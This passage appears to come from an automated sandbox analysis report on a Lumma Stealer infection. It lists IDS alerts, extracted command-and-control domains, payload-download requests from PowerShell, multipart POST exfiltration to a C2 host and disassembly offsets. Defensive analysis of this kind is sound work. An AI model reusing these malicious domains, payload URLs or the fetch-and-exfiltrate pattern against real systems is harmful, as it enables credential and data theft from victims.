              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_00386548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_0039CDAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], dx10_2_0038AD93
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebp+00h], al10_2_00398633
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi10_2_0039A623
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_0039CE04
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_003AE678
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_003AE678
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_003AE674
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_003AE674
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-20h], eax10_2_00385656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_00385656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_0039CE4C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ecx10_2_0038D6F4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_0038D6F4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_003A5F00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx10_2_00395FA6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-091E2CE1h]10_2_00395FA6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [esi+ecx], 0000h10_2_003927F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_003927F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi-00005E99h]10_2_0038AFD7

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49889 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49897 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058660 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (imbibelubmbe .click) : 192.168.2.4:53299 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49904 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49928 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49945 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49936 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49897 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49897 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49889 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49945 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49936 -> 188.114.97.3:443
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: imbibelubmbe.click
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: global trafficHTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49951 -> 185.161.251.21:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q74O17O4JHA9CJ6NOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PNATZCY1T357User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8749Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UHJAPGRGYDDYHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HDUHR8BAL4UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3OEVAHF2KSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1066Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: imbibelubmbe.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: deduhko.klipzyroloo.shop
              Source: global trafficDNS traffic detected: DNS query: imbibelubmbe.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click
              Source: mshta.exe, 00000000.00000003.1660293289.0000000005A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wPiX
              Source: powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: powershell.exe, 0000000A.00000002.2894337354.0000000000819000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtI
              Source: powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtSVHj
              Source: powershell.exe, 0000000A.00000002.2888825435.000000000032B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
              Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/C
              Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/U
              Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/x
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop/mazLR
              Source: powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.
              Source: powershell.exe, 00000004.00000002.2506306725.0000000000420000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2507391421.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2506306725.000000000045A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.eml
              Source: powershell.exe, 0000000A.00000002.2890844747.0000000000779000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2893816228.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2897179208.0000000004D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imbibelubmbe.click/
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imbibelubmbe.click/api
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imbibelubmbe.click/apiq
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txta=
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtopw
              Source: powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49897 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49928 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49945 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49951 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A3890 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_003A3890
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A3890 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_003A3890
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A3A40 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_003A3A40

              System Summary

              barindex
              Source: Process Memory Space: powershell.exe PID: 4108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694A1F0 NtResumeThread,4_2_0694A1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694A2A0 NtResumeThread,4_2_0694A2A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694A1EA NtResumeThread,4_2_0694A1EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06701DAB4_2_06701DAB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067004484_2_06700448
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067062704_2_06706270
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067041704_2_06704170
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0670EB284_2_0670EB28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0670EB184_2_0670EB18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067088EF4_2_067088EF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067089204_2_06708920
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06710BC84_2_06710BC8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06718F704_2_06718F70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06710F3B4_2_06710F3B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06719FF14_2_06719FF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0671056D4_2_0671056D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067103194_2_06710319
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06710BC24_2_06710BC2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067103B84_2_067103B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067100404_2_06710040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067100114_2_06710011
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0671A0004_2_0671A000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067110C04_2_067110C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067110B04_2_067110B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0671E9284_2_0671E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068E62FF4_2_068E62FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_069416B84_2_069416B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_069447D84_2_069447D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_069447C84_2_069447C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06948B164_2_06948B16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694AC904_2_0694AC90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694AC804_2_0694AC80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0694B15B4_2_0694B15B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A881010_2_003A8810
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039813010_2_00398130
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037E9AA10_2_0037E9AA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003931E010_2_003931E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003891D610_2_003891D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00382AE010_2_00382AE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039DBBA10_2_0039DBBA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003953D010_2_003953D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A84D010_2_003A84D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038A5C110_2_0038A5C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003ABE0010_2_003ABE00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037871010_2_00378710
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037AF0D10_2_0037AF0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037CF4B10_2_0037CF4B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003A0FA910_2_003A0FA9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037DF9410_2_0037DF94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B000010_2_003B0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039F8B610_2_0039F8B6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038988F10_2_0038988F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0037A8D010_2_0037A8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038E92F10_2_0038E92F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0039A10010_2_0039A100
